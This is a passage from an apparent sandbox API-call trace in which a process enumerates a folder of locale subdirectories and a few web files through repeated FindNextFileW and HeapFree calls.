ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e408d2a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0171.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.541] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e408d2a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7c098ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e408d2a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-HK", cAlternateFileName="")) returned 1 [0171.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.542] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e408d2a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7c0b4b7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e42efab, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ID", cAlternateFileName="")) returned 1 [0171.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.544] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e42efab, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7c6d3fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e42efab, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-IE", cAlternateFileName="")) returned 1 [0171.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.545] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e42efab, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7ca1328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e42efab, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-IN", cAlternateFileName="")) returned 1 [0171.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.547] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e42efab, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7d0e1e3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4551d8, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-MY", cAlternateFileName="")) returned 1 [0171.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.601] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4551d8, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7d107f6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4551d8, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-NZ", cAlternateFileName="")) returned 1 [0171.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.605] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4551d8, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7d8451a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4551d8, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-PH", cAlternateFileName="")) returned 1 [0171.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.608] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e47b424, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7de1d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e47b424, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0171.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.613] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e47b424, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7de3d39, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e47b424, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ZA", cAlternateFileName="")) returned 1 [0171.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.616] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e47b424, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7e82a38, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4a167a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-AR", cAlternateFileName="")) returned 1 [0171.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.619] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4a167a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7f2851c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4a167a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-CL", cAlternateFileName="")) returned 1 [0171.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.623] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4a167a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7f2a5d6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4a167a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-CO", cAlternateFileName="")) returned 1 [0171.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.626] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4a167a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7f8f938, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4c78e2, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0171.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.629] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4c78e2, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7f926c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4c78e2, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0171.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.634] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4c78e2, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa7fd9866, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e4c78e2, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-US", cAlternateFileName="")) returned 1 [0171.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.638] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e4edb3a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa803fb1a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e93ff63, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-XL", cAlternateFileName="")) returned 1 [0171.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.641] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e9661e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa80b9206, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8ebc8896, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0171.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.827] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ebc8896, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8130bd1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8ec87470, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-ES", cAlternateFileName="")) returned 1 [0172.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.207] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ecad633, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa817116e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8ed6c2ab, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0172.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.218] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ed6c2ab, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa81d6f2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f2a33eb, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-BE", cAlternateFileName="")) returned 1 [0172.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.221] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f2a33eb, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa820b284, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f2c9637, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0172.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.222] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f2c9637, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8276077, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f2c9637, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-CH", cAlternateFileName="")) returned 1 [0172.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.224] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f2c9637, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa830d026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f2ef892, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0172.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.226] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f2ef892, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa830f28d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f315afa, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-XF", cAlternateFileName="")) returned 1 [0172.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.227] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f315afa, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8397774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f315afa, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl-ES", cAlternateFileName="")) returned 1 [0172.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.229] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f33bd1b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa83e88ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f33bd1b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0172.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.231] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f33bd1b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa83eab4d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f33bd1b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0172.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.233] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f33bd1b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa84655fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f361f6d, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0172.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.235] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e2fdd51, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x3d2b8e00, ftLastWriteTime.dwHighDateTime=0x1d2c281, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.html", cAlternateFileName="INDEX~1.HTM")) returned 1 [0172.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.237] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f361f6d, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa84fae3d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f3881cc, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0172.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.239] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f3881cc, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa85726e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f3881cc, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0172.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.246] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f3881cc, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8575326, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f3ae466, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0172.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.251] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e2fdd51, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x57d93800, ftLastWriteTime.dwHighDateTime=0x1d3225e, nFileSizeHigh=0x0, nFileSizeLow=0xee2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageSelector.js", cAlternateFileName="LANGUA~1.JS")) returned 1 [0172.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.256] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f3ae466, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa860670d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f3d467a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0172.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.340] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f3d467a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8608b57, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f3d467a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0172.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.341] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e2fdd51, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x1f852a00, ftLastWriteTime.dwHighDateTime=0x1d3225d, nFileSizeHigh=0x0, nFileSizeLow=0x13d, dwReserved0=0x0, dwReserved1=0x0, cFileName="metadata.json", cAlternateFileName="METADA~1.JSO")) returned 1 [0172.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.372] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f3fa8d2, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa8664e62, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f3fa8d2, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0172.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.381] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f3fa8d2, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa86afcc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8f420b1b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-BE", cAlternateFileName="")) returned 1 [0172.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0172.382] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f420b1b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa86b1f8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 